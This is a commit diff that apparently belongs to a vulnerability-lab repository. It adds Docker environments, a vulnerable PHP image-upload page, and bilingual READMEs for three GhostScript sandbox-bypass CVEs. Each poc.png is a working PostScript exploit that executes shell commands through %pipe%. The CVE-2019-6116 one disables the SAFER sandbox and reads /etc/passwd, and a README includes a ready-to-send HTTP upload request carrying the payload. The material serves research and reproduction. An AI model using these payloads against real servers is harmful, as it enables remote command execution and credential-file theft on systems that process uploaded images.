first commit

ghostscript/CVE-2018-16509/README.md

@@ -0,0 +1,38 @@
+# GhostScript Sandbox Bypass Command Execution (CVE-2018-16509)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+GhostScript is a suite of software based on an interpreter for Adobe Systems' PostScript and PDF page description languages. It is widely used by many image processing libraries such as ImageMagick and Python PIL.
+
+On August 21st, 2018, security researcher Tavis Ormandy disclosed that GhostScript's security sandbox could be bypassed through maliciously crafted image content, leading to command execution, file reading, and file deletion vulnerabilities.
+
+References:
+
+- <http://seclists.org/oss-sec/2018/q3/142>
+- <https://bugs.chromium.org/p/project-zero/issues/detail?id=1640>
+
+## Environment Setup
+
+Execute the following command to start a vulnerable environment (including GhostScript 9.23 and ImageMagick 7.0.8):
+
+```
+docker compose up -d
+```
+
+After the server is started, visit `http://your-ip:8080` to see an upload component.
+
+## Vulnerability Reproduction
+
+Upload [poc.png](poc.png) to execute the command `id > /tmp/success && cat /tmp/success`. Enter the container using `docker compose exec web bash`, and you will see that /tmp/success has been created.
+
+![](1.png)
+
+You can also test this vulnerability using the command line:
+
+```
+docker run -it --rm --name im -v `pwd`/poc.png:/poc.png vulhub/imagemagick:7.0.8-10 convert /poc.png /poc.gif
+```
+
+The command execution result shows that the `id` command has been successfully executed.
+
+![](2.png)

ghostscript/CVE-2018-16509/README.zh-cn.md

@@ -0,0 +1,36 @@
+# GhostScript 沙箱绕过命令执行漏洞（CVE-2018-16509）
+
+GhostScript 是一套基于 Adobe Systems 的 PostScript 和 PDF 页面描述语言解释器的软件。它被许多图像处理库广泛使用，如 ImageMagick、Python PIL 等。
+
+2018年8月21日，安全研究员 Tavis Ormandy 通过公开邮件列表披露了 GhostScript 的安全沙箱可以被绕过的漏洞。通过构造恶意的图片内容，攻击者可以实现命令执行、文件读取和文件删除等操作。
+
+参考链接：
+
+- <http://seclists.org/oss-sec/2018/q3/142>
+- <https://bugs.chromium.org/p/project-zero/issues/detail?id=1640>
+
+## 环境搭建
+
+执行如下命令启动漏洞环境（其中包括 GhostScript 9.23 和 ImageMagick 7.0.8）：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问 `http://your-ip:8080` 将看到一个文件上传组件。
+
+## 漏洞复现
+
+上传 [poc.png](poc.png) 文件，该文件将执行命令 `id > /tmp/success && cat /tmp/success`。使用 `docker compose exec web bash` 进入容器后，可以看到 /tmp/success 文件已被创建。
+
+![](1.png)
+
+你也可以使用命令行来测试该漏洞：
+
+```
+docker run -it --rm --name im -v `pwd`/poc.png:/poc.png vulhub/imagemagick:7.0.8-10 convert /poc.png /poc.gif
+```
+
+从执行结果可以看到，`id` 命令已被成功执行。
+
+![](2.png)

ghostscript/CVE-2018-16509/docker-compose.yml

@@ -0,0 +1,8 @@
+services:
+ web:
+   image: vulhub/imagemagick:7.0.8-10-php
+   command: php -t /var/www/html -S 0.0.0.0:8080
+   volumes:
+    - ./index.php:/var/www/html/index.php
+   ports:
+    - "8080:8080"

ghostscript/CVE-2018-16509/index.php

@@ -0,0 +1,21 @@
+<?php
+
+if (!empty($_FILES)):
+
+$ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
+if (!in_array($ext, ['gif', 'png', 'jpg', 'jpeg'])) {
+    die('Unsupported filetype uploaded.');
+}
+
+$size = shell_exec("identify -format '%w x %h' {$_FILES['file_upload']['tmp_name']}");
+
+echo "Image size is: $size";
+
+else:
+?>
+<form method="post" enctype="multipart/form-data">
+    File: <input type="file" name="file_upload">
+    <input type="submit">
+</form>
+<?php
+endif;

ghostscript/CVE-2018-16509/poc.png

@@ -0,0 +1,8 @@
+%!PS
+userdict /setpagedevice undef
+save
+legal
+{ null restore } stopped { pop } if
+{ legal } stopped { pop } if
+restore
+mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops

ghostscript/CVE-2018-19475/README.md

@@ -0,0 +1,54 @@
+# GhostScript Sandbox Bypass Command Execution (CVE-2018-19475)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+GhostScript is a suite of software based on an interpreter for Adobe Systems' PostScript and PDF page description languages. It is widely used by many image processing libraries.
+
+In late 2018, Man Yue Mo from the Semmle Security Research Team published a variant of [CVE-2018-16509](../CVE-2018-16509), designated as CVE-2018-19475. This vulnerability allows attackers to bypass GhostScript's sandbox through a malicious image and execute arbitrary commands in gs versions prior to 9.26.
+
+References:
+
+- <https://blog.semmle.com/ghostscript-CVE-2018-19475/>
+- <https://bugs.ghostscript.com/show_bug.cgi?id=700153>
+
+## Environment Setup
+
+Execute the following command to start a vulnerable environment (including GhostScript 9.25 and ImageMagick 7.0.8-20):
+
+```
+docker compose up -d
+```
+
+After the server is started, visit `http://your-ip:8080` to see an upload component.
+
+## Vulnerability Reproduction
+
+Upload the POC as an image to execute the command `id > /tmp/success && cat /tmp/success`:
+
+```
+POST /index.php HTTP/1.1
+Host: target
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryukZmnyhO
+Content-Length: 279
+
+------WebKitFormBoundaryukZmnyhO
+Content-Disposition: form-data; name="file_upload"; filename="1.jpg"
+content-Type="image/png"
+
+%!PS
+0 1 300367 {} for
+{save restore} stopped {} if
+(%pipe%id > /tmp/success && cat /tmp/success) (w) file
+------WebKitFormBoundaryukZmnyhO--
+```
+
+As you can see, the command will be successfully executed.
+
+![](1.png)
+
+In real-world scenarios, you may need to use out-of-band techniques to detect the vulnerability as direct output may not be available.

ghostscript/CVE-2018-19475/README.zh-cn.md

@@ -0,0 +1,52 @@
+# GhostScript 沙箱绕过命令执行漏洞（CVE-2018-19475）
+
+GhostScript 是一套基于 Adobe Systems 的 PostScript 和 PDF 页面描述语言解释器的软件。它被许多图像处理库广泛使用。
+
+2018年底，来自 Semmle Security Research Team 的 Man Yue Mo 发表了 CVE-2018-16509 漏洞的变体 CVE-2018-19475。该漏洞允许攻击者通过恶意图片绕过 GhostScript 的沙箱，进而在 9.26 以前版本的 gs 中执行任意命令。
+
+参考链接：
+
+- <https://blog.semmle.com/ghostscript-CVE-2018-19475/>
+- <https://bugs.ghostscript.com/show_bug.cgi?id=700153>
+
+## 环境搭建
+
+执行如下命令启动漏洞环境（其中包括 GhostScript 9.25 和 ImageMagick 7.0.8-20）：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问 `http://your-ip:8080` 将看到一个文件上传组件。
+
+## 漏洞复现
+
+将 POC 作为图片上传，执行命令 `id > /tmp/success && cat /tmp/success`：
+
+```
+POST /index.php HTTP/1.1
+Host: target
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryukZmnyhO
+Content-Length: 279
+
+------WebKitFormBoundaryukZmnyhO
+Content-Disposition: form-data; name="file_upload"; filename="1.jpg"
+content-Type="image/png"
+
+%!PS
+0 1 300367 {} for
+{save restore} stopped {} if
+(%pipe%id > /tmp/success && cat /tmp/success) (w) file
+------WebKitFormBoundaryukZmnyhO--
+```
+
+可见，命令将被成功执行。
+
+![](1.png)
+
+在实际环境中，由于通常无法直接看到命令执行结果，你可能需要使用带外攻击技术来检测漏洞。

ghostscript/CVE-2018-19475/docker-compose.yml

@@ -0,0 +1,8 @@
+services:
+ web:
+   image: vulhub/imagemagick:7.0.8-20-php
+   command: php -t /var/www/html -S 0.0.0.0:8080
+   volumes:
+    - ./index.php:/var/www/html/index.php
+   ports:
+    - "8080:8080"

ghostscript/CVE-2018-19475/index.php

@@ -0,0 +1,21 @@
+<?php
+
+if (!empty($_FILES)):
+
+$ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
+if (!in_array($ext, ['gif', 'png', 'jpg', 'jpeg'])) {
+    die('Unsupported filetype uploaded.');
+}
+
+$size = shell_exec("identify -format '%w x %h' {$_FILES['file_upload']['tmp_name']}");
+
+echo "Image size is: $size";
+
+else:
+?>
+<form method="post" enctype="multipart/form-data">
+    File: <input type="file" name="file_upload">
+    <input type="submit">
+</form>
+<?php
+endif;

ghostscript/CVE-2018-19475/poc.png

@@ -0,0 +1,4 @@
+%!PS
+0 1 300367 {} for
+{save restore} stopped {} if
+(%pipe%id > /tmp/success && cat /tmp/success) (w) file

ghostscript/CVE-2019-6116/README.md

@@ -0,0 +1,38 @@
+# GhostScript Sandbox Bypass Command Execution (CVE-2019-6116)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+GhostScript is a suite of software based on an interpreter for Adobe Systems' PostScript and PDF page description languages. It is widely used by many image processing libraries such as ImageMagick and Python PIL.
+
+On January 23rd, 2019, Artifex officially merged six fixes into the master branch of GhostScript to address CVE-2019-6116. This vulnerability was reported by Google security researcher Tavis on December 3rd, 2018. The vulnerability allows attackers to bypass GhostScript's security sandbox, leading to arbitrary command execution and file reading capabilities.
+
+References:
+
+- <https://bugs.chromium.org/p/project-zero/issues/detail?id=1729&desc=2>
+- <https://www.anquanke.com/post/id/170255>
+
+## Environment Setup
+
+Execute the following command to start a vulnerable environment (including GhostScript 9.26 and ImageMagick 7.0.8-27):
+
+```
+docker compose up -d
+```
+
+After the server is started, visit `http://your-ip:8080` to see an upload component.
+
+## Vulnerability Reproduction
+
+Upload the provided [POC](poc.png) file to execute the command `id > /tmp/success`.
+
+![](1.png)
+
+You can also test this vulnerability using the command line:
+
+```
+docker run -it --rm --name uu -v `pwd`/poc.png:/tmp/poc.png vulhub/imagemagick:7.0.8-27-php identify /tmp/poc.png
+```
+
+The command will be successfully executed.
+
+![](2.png)

ghostscript/CVE-2019-6116/README.zh-cn.md

@@ -0,0 +1,36 @@
+# GhostScript 沙箱绕过命令执行漏洞（CVE-2019-6116）
+
+GhostScript 是一套基于 Adobe Systems 的 PostScript 和 PDF 页面描述语言解释器的软件。它被许多图像处理库广泛使用，如 ImageMagick、Python PIL 等。
+
+2019年1月23日，Artifex 官方在 GhostScript 的 master 分支上合并了多达6处的修复，用于修复 CVE-2019-6116 漏洞。该漏洞由 Google 安全研究员 Tavis 于2018年12月3日提交。漏洞允许攻击者直接绕过 GhostScript 的安全沙箱，从而执行任意命令或读取任意文件。
+
+参考链接：
+
+- <https://bugs.chromium.org/p/project-zero/issues/detail?id=1729&desc=2>
+- <https://www.anquanke.com/post/id/170255>
+
+## 环境搭建
+
+执行如下命令启动漏洞环境（其中包括 GhostScript 9.26 和 ImageMagick 7.0.8-27）：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问 `http://your-ip:8080` 将看到一个文件上传组件。
+
+## 漏洞复现
+
+上传提供的 [POC](poc.png) 文件，即可执行命令 `id > /tmp/success`。
+
+![](1.png)
+
+你也可以使用命令行来测试该漏洞：
+
+```
+docker run -it --rm --name uu -v `pwd`/poc.png:/tmp/poc.png vulhub/imagemagick:7.0.8-27-php identify /tmp/poc.png
+```
+
+命令将被成功执行。
+
+![](2.png)

ghostscript/CVE-2019-6116/docker-compose.yml

@@ -0,0 +1,8 @@
+services:
+ web:
+   image: vulhub/imagemagick:7.0.8-27-php
+   command: php -t /var/www/html -S 0.0.0.0:8080
+   volumes:
+    - ./index.php:/var/www/html/index.php
+   ports:
+    - "8080:8080"

ghostscript/CVE-2019-6116/index.php

@@ -0,0 +1,21 @@
+<?php
+
+if (!empty($_FILES)):
+
+$ext = pathinfo($_FILES['file_upload']['name'], PATHINFO_EXTENSION);
+if (!in_array($ext, ['gif', 'png', 'jpg', 'jpeg'])) {
+    die('Unsupported filetype uploaded.');
+}
+
+$size = shell_exec("identify -format '%w x %h' {$_FILES['file_upload']['tmp_name']}");
+
+echo "Image size is: $size";
+
+else:
+?>
+<form method="post" enctype="multipart/form-data">
+    File: <input type="file" name="file_upload">
+    <input type="submit">
+</form>
+<?php
+endif;

ghostscript/CVE-2019-6116/poc.png

@@ -0,0 +1,73 @@
+%!PS
+% extract .actual_pdfpaintproc operator from pdfdict
+/.actual_pdfpaintproc pdfdict /.actual_pdfpaintproc get def
+
+/exploit {
+    (Stage 11: Exploitation...)=
+
+    /forceput exch def
+
+    systemdict /SAFER false forceput
+    userparams /LockFilePermissions false forceput
+    systemdict /userparams get /PermitFileControl [(*)] forceput
+    systemdict /userparams get /PermitFileWriting [(*)] forceput
+    systemdict /userparams get /PermitFileReading [(*)] forceput
+
+    % update
+    save restore
+
+    % All done.
+    stop
+} def
+
+errordict /typecheck {
+    /typecount typecount 1 add def
+    (Stage 10: /typecheck #)=only typecount ==
+
+    % The first error will be the .knownget, which we handle and setup the
+    % stack. The second error will be the ifelse (missing boolean), and then we
+    % dump the operands.
+    typecount 1 eq { null } if
+    typecount 2 eq { pop 7 get exploit } if
+    typecount 3 eq { (unexpected)= quit }  if
+} put
+
+% The pseudo-operator .actual_pdfpaintproc from pdf_draw.ps pushes some
+% executable arrays onto the operand stack that contain .forceput, but are not
+% marked as executeonly or pseudo-operators.
+%
+% The routine was attempting to pass them to ifelse, but we can cause that to
+% fail because when the routine was declared, it used `bind` but many of the
+% names it uses are not operators and so are just looked up in the dictstack.
+%
+% This means we can push a dict onto the dictstack and control how the routine
+% works.
+<<
+    /typecount      0
+    /PDFfile        { (Stage 0: PDFfile)= currentfile }
+    /q              { (Stage 1: q)= } % no-op
+    /oget           { (Stage 3: oget)= pop pop 0 } % clear stack
+    /pdfemptycount  { (Stage 4: pdfemptycount)= } % no-op
+    /gput           { (Stage 5: gput)= }  % no-op
+    /resolvestream  { (Stage 6: resolvestream)= } % no-op
+    /pdfopdict      { (Stage 7: pdfopdict)= } % no-op
+    /.pdfruncontext { (Stage 8: .pdfruncontext)= 0 1 mark } % satisfy counttomark and index
+    /pdfdict        { (Stage 9: pdfdict)=
+        % cause a /typecheck error we handle above
+        true
+    }
+>> begin <<>> <<>> { .actual_pdfpaintproc } stopped pop
+
+(Should now have complete control over ghostscript, attempting to read /etc/passwd...)=
+
+% Demonstrate reading a file we shouldnt have access to.
+(/etc/passwd) (r) file dup 64 string readline pop == closefile
+
+(Attempting to execute a shell command...)= flush
+
+% run command
+(%pipe%id > /tmp/success) (w) file closefile
+
+(All done.)=
+
+quit